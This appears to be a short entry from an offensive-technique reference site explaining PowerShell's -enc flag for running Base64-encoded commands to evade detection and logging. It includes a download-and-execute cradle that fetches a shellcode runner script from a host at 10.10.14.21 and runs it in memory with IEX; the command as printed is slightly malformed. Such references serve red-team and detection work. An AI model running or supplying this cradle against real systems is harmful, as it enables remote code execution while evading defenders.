.. / powershell-enc
Star

PowerShell supports executing Base64-encoded commands via the -EncodedCommand (-enc) flag. This is often used to obfuscate malicious commands, evade detection, and bypass command-line logging. An attacker encodes a PowerShell payload that downloads a remote script (run444.txt, a powershell shellcode runner) from a webserver and executes it in memory via Invoke-Expression (IEX). The encoded payload is then run using the powershell -enc syntax.

Command Reference:

Command to be executed: New-Object System.Net.WebClient).DownloadString('http://10.10.14.21/run444.txt') | IEX
Command: Copy Extra code: Copy References:

https://manage-the.cloud/2023/12/20/how-to-use-an-encoded-command-in-powershell/